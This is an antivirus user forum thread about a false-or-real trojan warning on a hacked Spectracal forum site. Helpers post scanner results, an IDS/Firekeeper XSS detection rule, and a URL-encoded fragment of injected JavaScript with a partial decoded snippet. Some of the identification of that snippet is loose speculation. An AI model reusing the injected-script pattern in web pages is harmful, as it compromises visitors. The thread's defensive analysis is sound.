False Trojan malware web reset when loading web page with zip attachments?

Avast Free Antivirus / Premium Security
1

I get a Trojan malware web reset when loading web pages in the Spectracal forum website, any page that has zip attachments. I frequent this forum and never had this problem, started less than a day ago. Sample below:

http://consumer.spectracal.com/forum/viewtopic.php?f=95&t=4135

Anybody else experiencing this?

2

Can you take a Screenshot please?

That would be helpful.

Please edit the link to hxxp or wxw to break the link. :slight_smile:

3

The link looks clean on all Website scanners that i ran.
Is this also happening without Login?

The IP is identified as risky by Zulu: http://zulu.zscaler.com/submission/show/3a5ace773fcc6db39b590494cad074c5-1376510268

But that is all i can see here.

Would you like to check the Site from an Website Analyst?

4

Hi Steven Winderlich

IDS alert for ETPRO WEB_CLIENT Microsoft Internet Explorer remote code execution via option element *
On this website 1 page has suspicious code

Firekeeper alert is for === Triggered rule ===
alert(url_content:“%3C”; url_content:“%22”; url_content:“%3E”; msg:“Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like.”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?q=0%5D%7D%3Bfunction+s%28%29%7B+a.P%28r%29%3Bf%5Bz%5D%28r%29%7Df.addEventListener%3Ff.addEventListener%28r%2Cs%2Cfalse%29%3Af.attachEvent%28%22on%22%2Br%2Cs%29%3Bvar+ld%3Dfunction%28%29%7Bfunction+p%28hd%29%7B+hd%3D%22head%22%3Breturn%5B%22%3C%22%2Chd%2C%22%3E%3C%2F%22%2Chd%2C%22%3E%3C%22%2Ci%2C%27+onl%27+%2B+%27oad%3D%22var+d%3D%27%2Cg%2C%22%3Bd.getElementsByTagName%28%27head%27%29%5B0%5D.%22%2C&client=flock&channel=fds&oe=utf-8&oq=0%5D%7D%3Bfunction+s%28%29%7B+a.P%28r%29%3Bf%5Bz%5D%28r%29%7Df.addEventListener%3Ff.addEventListener%28r%2Cs%2Cfalse%29%3Af.attachEvent%28%22on%22%2Br%2Cs%29%3Bvar+ld%3Dfunction%28%29%7Bfunction+p%28hd%29%7B+hd%3D%22head%22%3Breturn%5B%22%3C%22%2Chd%2C%22%3E%3C%2F%22%2Chd%2C%22%3E%3C%22%2Ci%2C%27+onl%27+%2B+%27oad%3D%22var+d%3D%27%2Cg%2C%22%3Bd.getElementsByTagName%28%27head%27%29%5B0%5D.%22%2C&gs_l=heirloom-serp.12…168869.173826.0.189025.41.14.0.0.0.7.416.1858.1j7j2j0j1.11.0…0…1ac.1j2.24.heirloom-serp…39.2.225.JuQszQRyOMk

Decoded script (complex functions -environment)

  
function s() {
a.P(r);
f[z](r);
}
  • Available. remote exploit. alias conficker worm like…

pol

5

So thismust be removed and then it should be OK.

6

Thanks guys. Looks like somebody hacked the site with the infection. I tried the web site just now and I get a formal Spectracal page saying the board is not available, so they must be cleaning it up.